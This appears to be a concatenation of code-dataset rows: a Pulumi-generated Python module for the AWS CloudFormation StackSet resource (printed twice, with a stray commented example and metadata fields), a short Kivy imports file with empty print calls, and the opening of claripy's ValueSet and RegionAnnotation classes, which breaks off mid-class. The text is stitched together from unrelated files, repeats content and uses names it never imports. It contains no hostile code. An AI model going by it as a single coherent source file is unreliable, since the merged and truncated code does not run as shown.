if administration_role_arn is None:
raise TypeError("Missing required property 'administration_role_arn'")
__props__['administration_role_arn'] = administration_role_arn
__props__['capabilities'] = capabilities
__props__['description'] = description
__props__['execution_role_name'] = execution_role_name
__props__['name'] = name
__props__['parameters'] = parameters
__props__['tags'] = tags
__props__['template_body'] = template_body
__props__['template_url'] = template_url
__props__['arn'] = None
__props__['stack_set_id'] = None
super(StackSet, __self__).__init__(
'aws:cloudformation/stackSet:StackSet',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
administration_role_arn: Optional[pulumi.Input[str]] = None,
arn: Optional[pulumi.Input[str]] = None,
capabilities: Optional[pulumi.Input[List[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
execution_role_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
stack_set_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
template_body: Optional[pulumi.Input[str]] = None,
template_url: Optional[pulumi.Input[str]] = None) -> 'StackSet':
"""
Get an existing StackSet resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] administration_role_arn: Amazon Resource Number (ARN) of the IAM Role in the administrator account.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN) of the StackSet.
:param pulumi.Input[List[pulumi.Input[str]]] capabilities: A list of capabilities. Valid values: `CAPABILITY_IAM`, `CAPABILITY_NAMED_IAM`, `CAPABILITY_AUTO_EXPAND`.
:param pulumi.Input[str] description: Description of the StackSet.
:param pulumi.Input[str] execution_role_name: Name of the IAM Role in all target accounts for StackSet operations. Defaults to `AWSCloudFormationStackSetExecutionRole`.
:param pulumi.Input[str] name: Name of the StackSet. The name must be unique in the region where you create your StackSet. The name can contain only alphanumeric characters (case-sensitive) and hyphens. It must start with an alphabetic character and cannot be longer than 128 characters.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Key-value map of input parameters for the StackSet template. All template parameters, including those with a `Default`, must be configured or ignored with `lifecycle` configuration block `ignore_changes` argument. All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument.
:param pulumi.Input[str] stack_set_id: Unique identifier of the StackSet.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of tags to associate with this StackSet and the Stacks created from it. AWS CloudFormation also propagates these tags to supported resources that are created in the Stacks. A maximum number of 50 tags can be specified.
:param pulumi.Input[str] template_body: String containing the CloudFormation template body. Maximum size: 51,200 bytes. Conflicts with `template_url`.
:param pulumi.Input[str] template_url: String containing the location of a file containing the CloudFormation template body. The URL must point to a template that is located in an Amazon S3 bucket. Maximum location file size: 460,800 bytes. Conflicts with `template_body`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["administration_role_arn"] = administration_role_arn
__props__["arn"] = arn
__props__["capabilities"] = capabilities
__props__["description"] = description
__props__["execution_role_name"] = execution_role_name
__props__["name"] = name
__props__["parameters"] = parameters
__props__["stack_set_id"] = stack_set_id
__props__["tags"] = tags
__props__["template_body"] = template_body
__props__["template_url"] = template_url
return StackSet(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="administrationRoleArn")
def administration_role_arn(self) -> pulumi.Output[str]:
"""
Amazon Resource Number (ARN) of the IAM Role in the administrator account.
"""
return pulumi.get(self, "administration_role_arn")
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
Amazon Resource Name (ARN) of the StackSet.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter
def capabilities(self) -> pulumi.Output[Optional[List[str]]]:
"""
A list of capabilities. Valid values: `CAPABILITY_IAM`, `CAPABILITY_NAMED_IAM`, `CAPABILITY_AUTO_EXPAND`.
"""
return pulumi.get(self, "capabilities")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Description of the StackSet.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="executionRoleName")
def execution_role_name(self) -> pulumi.Output[Optional[str]]:
"""
Name of the IAM Role in all target accounts for StackSet operations. Defaults to `AWSCloudFormationStackSetExecutionRole`.
"""
return pulumi.get(self, "execution_role_name")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the StackSet. The name must be unique in the region where you create your StackSet. The name can contain only alphanumeric characters (case-sensitive) and hyphens. It must start with an alphabetic character and cannot be longer than 128 characters.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def parameters(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Key-value map of input parameters for the StackSet template. All template parameters, including those with a `Default`, must be configured or ignored with `lifecycle` configuration block `ignore_changes` argument. All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument.
"""
return pulumi.get(self, "parameters")
@property
@pulumi.getter(name="stackSetId")
def stack_set_id(self) -> pulumi.Output[str]:
"""
Unique identifier of the StackSet.
"""
return pulumi.get(self, "stack_set_id")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Key-value map of tags to associate with this StackSet and the Stacks created from it. AWS CloudFormation also propagates these tags to supported resources that are created in the Stacks. A maximum number of 50 tags can be specified.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="templateBody")
def template_body(self) -> pulumi.Output[str]:
"""
String containing the CloudFormation template body. Maximum size: 51,200 bytes. Conflicts with `template_url`.
"""
return pulumi.get(self, "template_body")
@property
@pulumi.getter(name="templateUrl")
def template_url(self) -> pulumi.Output[Optional[str]]:
"""
String containing the location of a file containing the CloudFormation template body. The URL must point to a template that is located in an Amazon S3 bucket. Maximum location file size: 460,800 bytes. Conflicts with `template_body`.
"""
return pulumi.get(self, "template_url")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
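# --- Illustrative sketch, not part of the generated provider code ---
# A StackSet by itself deploys nothing; Stacks are created through StackSet
# instances. A follow-up along these lines is typical; the argument names are
# assumptions about the StackSetInstance resource, and the account/region
# values are placeholders.
#
#   example_instance = aws.cloudformation.StackSetInstance("exampleInstance",
#       stack_set_name=example.name,
#       account_id="123456789012",
#       region="us-east-1")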
| # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Dict, List, Mapping, Optional, Tuple, Union
from .. import _utilities, _tables
__all__ = ['StackSet']
class StackSet(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
administration_role_arn: Optional[pulumi.Input[str]] = None,
capabilities: Optional[pulumi.Input[List[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
execution_role_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
template_body: Optional[pulumi.Input[str]] = None,
template_url: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Manages a CloudFormation StackSet. StackSets allow CloudFormation templates to be easily deployed across multiple accounts and regions via StackSet Instances (`cloudformation.StackSetInstance` resource). Additional information about StackSets can be found in the [AWS CloudFormation User Guide](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/what-is-cfnstacksets.html).
> **NOTE:** All template parameters, including those with a `Default`, must be configured or ignored with the `lifecycle` configuration block `ignore_changes` argument.
> **NOTE:** All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
a_ws_cloud_formation_stack_set_administration_role_assume_role_policy = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
actions=["sts:AssumeRole"],
effect="Allow",
principals=[aws.iam.GetPolicyDocumentStatementPrincipalArgs(
identifiers=["cloudformation.amazonaws.com"],
type="Service",
)],
)])
a_ws_cloud_formation_stack_set_administration_role = aws.iam.Role("aWSCloudFormationStackSetAdministrationRole", assume_role_policy=a_ws_cloud_formation_stack_set_administration_role_assume_role_policy.json)
example = aws.cloudformation.StackSet("example",
administration_role_arn=a_ws_cloud_formation_stack_set_administration_role.arn,
parameters={
"VPCCidr": "10.0.0.0/16",
},
template_body=\"\"\"{
"Parameters" : {
"VPCCidr" : {
"Type" : "String",
"Default" : "10.0.0.0/16",
"Description" : "Enter the CIDR block for the VPC. Default is 10.0.0.0/16."
}
},
"Resources" : {
"myVpc": {
"Type" : "AWS::EC2::VPC",
"Properties" : {
"CidrBlock" : { "Ref" : "VPCCidr" },
"Tags" : [
{"Key": "Name", "Value": "Primary_CF_VPC"}
]
}
}
}
}
\"\"\")
a_ws_cloud_formation_stack_set_administration_role_execution_policy_policy_document = example.execution_role_name.apply(lambda execution_role_name: aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
actions=["sts:AssumeRole"],
effect="Allow",
resources=[f"arn:aws:iam::*:role/{execution_role_name}"],
)]))
a_ws_cloud_formation_stack_set_administration_role_execution_policy_role_policy = aws.iam.RolePolicy("aWSCloudFormationStackSetAdministrationRoleExecutionPolicyRolePolicy",
policy=a_ws_cloud_formation_stack_set_administration_role_execution_policy_policy_document.json,
role=a_ws_cloud_formation_stack_set_administration_role.name)
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] administration_role_arn: Amazon Resource Number (ARN) of the IAM Role in the administrator account.
:param pulumi.Input[List[pulumi.Input[str]]] capabilities: A list of capabilities. Valid values: `CAPABILITY_IAM`, `CAPABILITY_NAMED_IAM`, `CAPABILITY_AUTO_EXPAND`.
:param pulumi.Input[str] description: Description of the StackSet.
:param pulumi.Input[str] execution_role_name: Name of the IAM Role in all target accounts for StackSet operations. Defaults to `AWSCloudFormationStackSetExecutionRole`.
:param pulumi.Input[str] name: Name of the StackSet. The name must be unique in the region where you create your StackSet. The name can contain only alphanumeric characters (case-sensitive) and hyphens. It must start with an alphabetic character and cannot be longer than 128 characters.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Key-value map of input parameters for the StackSet template. All template parameters, including those with a `Default`, must be configured or ignored with `lifecycle` configuration block `ignore_changes` argument. All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of tags to associate with this StackSet and the Stacks created from it. AWS CloudFormation also propagates these tags to supported resources that are created in the Stacks. A maximum number of 50 tags can be specified.
:param pulumi.Input[str] template_body: String containing the CloudFormation template body. Maximum size: 51,200 bytes. Conflicts with `template_url`.
:param pulumi.Input[str] template_url: String containing the location of a file containing the CloudFormation template body. The URL must point to a template that is located in an Amazon S3 bucket. Maximum location file size: 460,800 bytes. Conflicts with `template_body`.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if administration_role_arn is None:
raise TypeError("Missing required property 'administration_role_arn'")
__props__['administration_role_arn'] = administration_role_arn
__props__['capabilities'] = capabilities
__props__['description'] = description
__props__['execution_role_name'] = execution_role_name
__props__['name'] = name
__props__['parameters'] = parameters
__props__['tags'] = tags
__props__['template_body'] = template_body
__props__['template_url'] = template_url
__props__['arn'] = None
__props__['stack_set_id'] = None
super(StackSet, __self__).__init__(
'aws:cloudformation/stackSet:StackSet',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
administration_role_arn: Optional[pulumi.Input[str]] = None,
arn: Optional[pulumi.Input[str]] = None,
capabilities: Optional[pulumi.Input[List[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
execution_role_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
stack_set_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
template_body: Optional[pulumi.Input[str]] = None,
template_url: Optional[pulumi.Input[str]] = None) -> 'StackSet':
"""
Get an existing StackSet resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] administration_role_arn: Amazon Resource Number (ARN) of the IAM Role in the administrator account.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN) of the StackSet.
:param pulumi.Input[List[pulumi.Input[str]]] capabilities: A list of capabilities. Valid values: `CAPABILITY_IAM`, `CAPABILITY_NAMED_IAM`, `CAPABILITY_AUTO_EXPAND`.
:param pulumi.Input[str] description: Description of the StackSet.
:param pulumi.Input[str] execution_role_name: Name of the IAM Role in all target accounts for StackSet operations. Defaults to `AWSCloudFormationStackSetExecutionRole`.
:param pulumi.Input[str] name: Name of the StackSet. The name must be unique in the region where you create your StackSet. The name can contain only alphanumeric characters (case-sensitive) and hyphens. It must start with an alphabetic character and cannot be longer than 128 characters.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Key-value map of input parameters for the StackSet template. All template parameters, including those with a `Default`, must be configured or ignored with `lifecycle` configuration block `ignore_changes` argument. All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument.
:param pulumi.Input[str] stack_set_id: Unique identifier of the StackSet.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of tags to associate with this StackSet and the Stacks created from it. AWS CloudFormation also propagates these tags to supported resources that are created in the Stacks. A maximum number of 50 tags can be specified.
:param pulumi.Input[str] template_body: String containing the CloudFormation template body. Maximum size: 51,200 bytes. Conflicts with `template_url`.
:param pulumi.Input[str] template_url: String containing the location of a file containing the CloudFormation template body. The URL must point to a template that is located in an Amazon S3 bucket. Maximum location file size: 460,800 bytes. Conflicts with `template_body`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["administration_role_arn"] = administration_role_arn
__props__["arn"] = arn
__props__["capabilities"] = capabilities
__props__["description"] = description
__props__["execution_role_name"] = execution_role_name
__props__["name"] = name
__props__["parameters"] = parameters
__props__["stack_set_id"] = stack_set_id
__props__["tags"] = tags
__props__["template_body"] = template_body
__props__["template_url"] = template_url
return StackSet(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="administrationRoleArn")
def administration_role_arn(self) -> pulumi.Output[str]:
"""
Amazon Resource Number (ARN) of the IAM Role in the administrator account.
"""
return pulumi.get(self, "administration_role_arn")
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
Amazon Resource Name (ARN) of the StackSet.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter
def capabilities(self) -> pulumi.Output[Optional[List[str]]]:
"""
A list of capabilities. Valid values: `CAPABILITY_IAM`, `CAPABILITY_NAMED_IAM`, `CAPABILITY_AUTO_EXPAND`.
"""
return pulumi.get(self, "capabilities")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Description of the StackSet.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="executionRoleName")
def execution_role_name(self) -> pulumi.Output[Optional[str]]:
"""
Name of the IAM Role in all target accounts for StackSet operations. Defaults to `AWSCloudFormationStackSetExecutionRole`.
"""
return pulumi.get(self, "execution_role_name")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the StackSet. The name must be unique in the region where you create your StackSet. The name can contain only alphanumeric characters (case-sensitive) and hyphens. It must start with an alphabetic character and cannot be longer than 128 characters.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def parameters(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Key-value map of input parameters for the StackSet template. All template parameters, including those with a `Default`, must be configured or ignored with `lifecycle` configuration block `ignore_changes` argument. All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument.
"""
return pulumi.get(self, "parameters")
@property
@pulumi.getter(name="stackSetId")
def stack_set_id(self) -> pulumi.Output[str]:
"""
Unique identifier of the StackSet.
"""
return pulumi.get(self, "stack_set_id")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Key-value map of tags to associate with this StackSet and the Stacks created from it. AWS CloudFormation also propagates these tags to supported resources that are created in the Stacks. A maximum number of 50 tags can be specified.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="templateBody")
def template_body(self) -> pulumi.Output[str]:
"""
String containing the CloudFormation template body. Maximum size: 51,200 bytes. Conflicts with `template_url`.
"""
return pulumi.get(self, "template_body")
@property
@pulumi.getter(name="templateUrl")
def template_url(self) -> pulumi.Output[Optional[str]]:
"""
String containing the location of a file containing the CloudFormation template body. The URL must point to a template that is located in an Amazon S3 bucket. Maximum location file size: 460,800 bytes. Conflicts with `template_body`.
"""
return pulumi.get(self, "template_url")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop | en | 0.559059 | # coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** Manages a CloudFormation StackSet. StackSets allow CloudFormation templates to be easily deployed across multiple accounts and regions via StackSet Instances (`cloudformation.StackSetInstance` resource). Additional information about StackSets can be found in the [AWS CloudFormation User Guide](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/what-is-cfnstacksets.html). > **NOTE:** All template parameters, including those with a `Default`, must be configured or ignored with the `lifecycle` configuration block `ignore_changes` argument. > **NOTE:** All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument. ## Example Usage ```python import pulumi import pulumi_aws as aws a_ws_cloud_formation_stack_set_administration_role_assume_role_policy = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs( actions=["sts:AssumeRole"], effect="Allow", principals=[aws.iam.GetPolicyDocumentStatementPrincipalArgs( identifiers=["cloudformation.amazonaws.com"], type="Service", )], )]) a_ws_cloud_formation_stack_set_administration_role = aws.iam.Role("aWSCloudFormationStackSetAdministrationRole", assume_role_policy=a_ws_cloud_formation_stack_set_administration_role_assume_role_policy.json) example = aws.cloudformation.StackSet("example", administration_role_arn=a_ws_cloud_formation_stack_set_administration_role.arn, parameters={ "VPCCidr": "10.0.0.0/16", }, template_body=\"\"\"{ "Parameters" : { "VPCCidr" : { "Type" : "String", "Default" : "10.0.0.0/16", "Description" : "Enter the CIDR block for the VPC. Default is 10.0.0.0/16." } }, "Resources" : { "myVpc": { "Type" : "AWS::EC2::VPC", "Properties" : { "CidrBlock" : { "Ref" : "VPCCidr" }, "Tags" : [ {"Key": "Name", "Value": "Primary_CF_VPC"} ] } } } } \"\"\") a_ws_cloud_formation_stack_set_administration_role_execution_policy_policy_document = example.execution_role_name.apply(lambda execution_role_name: aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs( actions=["sts:AssumeRole"], effect="Allow", resources=[f"arn:aws:iam::*:role/{execution_role_name}"], )])) a_ws_cloud_formation_stack_set_administration_role_execution_policy_role_policy = aws.iam.RolePolicy("aWSCloudFormationStackSetAdministrationRoleExecutionPolicyRolePolicy", policy=a_ws_cloud_formation_stack_set_administration_role_execution_policy_policy_document.json, role=a_ws_cloud_formation_stack_set_administration_role.name) ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] administration_role_arn: Amazon Resource Number (ARN) of the IAM Role in the administrator account. :param pulumi.Input[List[pulumi.Input[str]]] capabilities: A list of capabilities. Valid values: `CAPABILITY_IAM`, `CAPABILITY_NAMED_IAM`, `CAPABILITY_AUTO_EXPAND`. :param pulumi.Input[str] description: Description of the StackSet. :param pulumi.Input[str] execution_role_name: Name of the IAM Role in all target accounts for StackSet operations. Defaults to `AWSCloudFormationStackSetExecutionRole`. :param pulumi.Input[str] name: Name of the StackSet. The name must be unique in the region where you create your StackSet. 
The name can contain only alphanumeric characters (case-sensitive) and hyphens. It must start with an alphabetic character and cannot be longer than 128 characters. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Key-value map of input parameters for the StackSet template. All template parameters, including those with a `Default`, must be configured or ignored with `lifecycle` configuration block `ignore_changes` argument. All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of tags to associate with this StackSet and the Stacks created from it. AWS CloudFormation also propagates these tags to supported resources that are created in the Stacks. A maximum number of 50 tags can be specified. :param pulumi.Input[str] template_body: String containing the CloudFormation template body. Maximum size: 51,200 bytes. Conflicts with `template_url`. :param pulumi.Input[str] template_url: String containing the location of a file containing the CloudFormation template body. The URL must point to a template that is located in an Amazon S3 bucket. Maximum location file size: 460,800 bytes. Conflicts with `template_body`. Get an existing StackSet resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] administration_role_arn: Amazon Resource Number (ARN) of the IAM Role in the administrator account. :param pulumi.Input[str] arn: Amazon Resource Name (ARN) of the StackSet. :param pulumi.Input[List[pulumi.Input[str]]] capabilities: A list of capabilities. Valid values: `CAPABILITY_IAM`, `CAPABILITY_NAMED_IAM`, `CAPABILITY_AUTO_EXPAND`. :param pulumi.Input[str] description: Description of the StackSet. :param pulumi.Input[str] execution_role_name: Name of the IAM Role in all target accounts for StackSet operations. Defaults to `AWSCloudFormationStackSetExecutionRole`. :param pulumi.Input[str] name: Name of the StackSet. The name must be unique in the region where you create your StackSet. The name can contain only alphanumeric characters (case-sensitive) and hyphens. It must start with an alphabetic character and cannot be longer than 128 characters. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Key-value map of input parameters for the StackSet template. All template parameters, including those with a `Default`, must be configured or ignored with `lifecycle` configuration block `ignore_changes` argument. All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument. :param pulumi.Input[str] stack_set_id: Unique identifier of the StackSet. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of tags to associate with this StackSet and the Stacks created from it. AWS CloudFormation also propagates these tags to supported resources that are created in the Stacks. A maximum number of 50 tags can be specified. :param pulumi.Input[str] template_body: String containing the CloudFormation template body. Maximum size: 51,200 bytes. Conflicts with `template_url`. :param pulumi.Input[str] template_url: String containing the location of a file containing the CloudFormation template body. 
The URL must point to a template that is located in an Amazon S3 bucket. Maximum location file size: 460,800 bytes. Conflicts with `template_body`. Amazon Resource Number (ARN) of the IAM Role in the administrator account. Amazon Resource Name (ARN) of the StackSet. A list of capabilities. Valid values: `CAPABILITY_IAM`, `CAPABILITY_NAMED_IAM`, `CAPABILITY_AUTO_EXPAND`. Description of the StackSet. Name of the IAM Role in all target accounts for StackSet operations. Defaults to `AWSCloudFormationStackSetExecutionRole`. Name of the StackSet. The name must be unique in the region where you create your StackSet. The name can contain only alphanumeric characters (case-sensitive) and hyphens. It must start with an alphabetic character and cannot be longer than 128 characters. Key-value map of input parameters for the StackSet template. All template parameters, including those with a `Default`, must be configured or ignored with `lifecycle` configuration block `ignore_changes` argument. All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument. Unique identifier of the StackSet. Key-value map of tags to associate with this StackSet and the Stacks created from it. AWS CloudFormation also propagates these tags to supported resources that are created in the Stacks. A maximum number of 50 tags can be specified. String containing the CloudFormation template body. Maximum size: 51,200 bytes. Conflicts with `template_url`. String containing the location of a file containing the CloudFormation template body. The URL must point to a template that is located in an Amazon S3 bucket. Maximum location file size: 460,800 bytes. Conflicts with `template_body`. | 1.63394 | 2 |
code/config/imports.py | farioso-fernando/cover-meu-beat | 0 | 8068 | from kivy.uix.screenmanager import ScreenManager
from kivy.uix.boxlayout import BoxLayout
from kivy.lang.builder import Builder
from kivy.animation import Animation
from kivy.core.window import Window
from kivymd.app import MDApp
import kivymd
import kivy
print(
)
def version():
kivy.require('2.0.0')
print(
) | from kivy.uix.screenmanager import ScreenManager
from kivy.uix.boxlayout import BoxLayout
from kivy.lang.builder import Builder
from kivy.animation import Animation
from kivy.core.window import Window
from kivymd.app import MDApp
import kivymd
import kivy
print(
)
def version():
kivy.require('2.0.0')
print(
) | none | 1 | 1.761887 | 2 |
|
claripy/vsa/valueset.py | kwalberg/claripy | 0 | 8069 | import functools
import itertools
import numbers
from ..backend_object import BackendObject
from ..annotation import Annotation
def normalize_types_two_args(f):
@functools.wraps(f)
def normalizer(self, region, o):
"""
Convert any object to an object that we can process.
"""
if isinstance(o, Base):
raise ClaripyValueError("BoolResult can't handle AST objects directly")
if not isinstance(o, StridedInterval):
raise ClaripyVSAOperationError('Unsupported operand type %s' % type(o))
return f(self, region, o)
return normalizer
def normalize_types_one_arg(f):
@functools.wraps(f)
def normalizer(self, o):
"""
Convert any object to an object that we can process.
"""
if isinstance(o, Base):
raise ClaripyValueError("BoolResult can't handle AST objects directly")
return f(self, o)
return normalizer
vs_id_ctr = itertools.count()
class RegionAnnotation(Annotation):
"""
Use RegionAnnotation to annotate ASTs. Normally, an AST annotated by RegionAnnotations is treated as a ValueSet.
    Note that Annotation objects are immutable. Do not modify the properties of an existing Annotation object; create a
    new one instead.
"""
def __init__(self, region_id, region_base_addr, offset):
self.region_id = region_id
self.region_base_addr = region_base_addr
self.offset = offset
# Do necessary conversion here
if isinstance(self.region_base_addr, Base):
self.region_base_addr = self.region_base_addr._model_vsa
if isinstance(self.offset, Base):
self.offset = self.offset._model_vsa
@property
def eliminatable(self):
"""
A Region annotation is not eliminatable in simplifications.
:return: False
:rtype: bool
"""
return False
@property
def relocatable(self):
"""
A Region annotation is not relocatable in simplifications.
:return: False
:rtype: bool
"""
return False
#
# Public methods
#
def relocate(self, src, dst):
"""
Override Annotation.relocate().
:param src: The old AST
:param dst: The new AST, as the result of a simplification
:return: The new annotation that should be applied on the new AST
"""
raise ClaripyVSAError('RegionAnnotation is not relocatable')
#
# Overriding base methods
#
def __hash__(self):
return hash((self.region_id, self.region_base_addr, hash(self.offset)))
def __repr__(self):
return "<RegionAnnotation %s:%#08x>" % (self.region_id, self.offset)
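# Illustrative sketch, not part of the original module: a RegionAnnotation is
# intended to be attached to an AST and later folded into a ValueSet. The flow
# below is an assumption about typical usage; the region id, base address and
# offset are made up.
#
#   anno = RegionAnnotation('stack', 0x7fff0000, offset_si)
#   ptr = claripy.BVS('ptr', 32).annotate(anno)       # AST carries the region
#   vs = ValueSet(bits=32).apply_annotation(anno)     # backend-side equivalent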
class ValueSet(BackendObject):
"""
ValueSet is a mapping between memory regions and corresponding offsets.
"""
def __init__(self, name=None, region=None, region_base_addr=None, bits=None, val=None):
"""
Constructor.
:param str name: Name of this ValueSet object. Only for debugging purposes.
:param str region: Region ID.
:param int region_base_addr: Base address of the region.
:param int bits: Size of the ValueSet.
:param val: an initial offset
"""
self._name = 'VS_%d' % next(vs_id_ctr) if name is None else name
if bits is None:
raise ClaripyVSAError('bits must be specified when creating a ValueSet.')
self._bits = bits
self._si = StridedInterval.empty(bits)
self._regions = {}
self._region_base_addrs = {}
self._reversed = False
# Shortcuts for initialization
# May not be useful though...
if region is not None and region_base_addr is not None and val is not None:
if isinstance(region_base_addr, numbers.Number):
# Convert it to a StridedInterval
region_base_addr = StridedInterval(bits=self._bits, stride=1,
lower_bound=region_base_addr,
upper_bound=region_base_addr)
if isinstance(val, numbers.Number):
val = StridedInterval(bits=bits, stride=0, lower_bound=val, upper_bound=val)
if isinstance(val, StridedInterval):
self._set_si(region, region_base_addr, val)
else:
raise ClaripyVSAError("Unsupported type '%s' for argument 'val'" % type(val))
else:
if region is not None or val is not None:
raise ClaripyVSAError("You must specify 'region' and 'val' at the same time.")
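    # Illustrative sketch, not part of the original file: constructing a 32-bit
    # ValueSet with a single region and a concrete offset (names and addresses
    # are made up).
    #
    #   vs = ValueSet(bits=32, region='global', region_base_addr=0, val=0x1000)
    #   vs.get_si('global')   # StridedInterval covering just 0x1000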
#
# Properties
#
@property
def name(self):
return self._name
@property
def bits(self):
return self._bits
@property
def regions(self):
return self._regions
@property
def reversed(self):
return self._reversed
@property
def unique(self):
        return len(self.regions) == 1 and next(iter(self.regions.values())).unique
@property
def cardinality(self):
card = 0
for region in self._regions:
card += self._regions[region].cardinality
return card
@property
def is_empty(self):
return len(self._regions) == 0
@property
def valueset(self):
return self
#
# Private methods
#
